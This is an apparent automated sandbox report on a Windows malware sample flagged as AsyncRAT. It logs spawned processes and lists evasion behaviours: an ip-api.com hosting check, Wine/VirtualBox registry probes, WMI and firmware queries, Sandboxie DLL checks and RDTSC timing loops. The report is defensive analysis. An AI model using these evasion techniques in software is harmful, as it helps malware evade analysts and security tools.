Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: regsvr32.exe PID: 6404, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep	graph_7-37990
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess	graph_5-9747
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess	graph_4-9912

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: regsvr32.exe, 00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: regsvr32.exe, 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLINFO

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: FBF0DB second address: FBF0DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: FBF0DF second address: FBF0E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 112582D second address: 1125833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1133B97 second address: 1133BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F2468CF6A36h 0x0000000f jmp 00007F2468CF6A40h 0x00000014 jmp 00007F2468CF6A3Ch 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1133BC5 second address: 1133BCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1133BCD second address: 1133BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1133BD1 second address: 1133BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1133BD7 second address: 1133BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F2468CF6A44h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11341E0 second address: 11341EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2468994E96h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1134314 second address: 1134318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1134318 second address: 113431E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 113431E second address: 113433F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F2468CF6A47h 0x0000000c jmp 00007F2468CF6A41h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
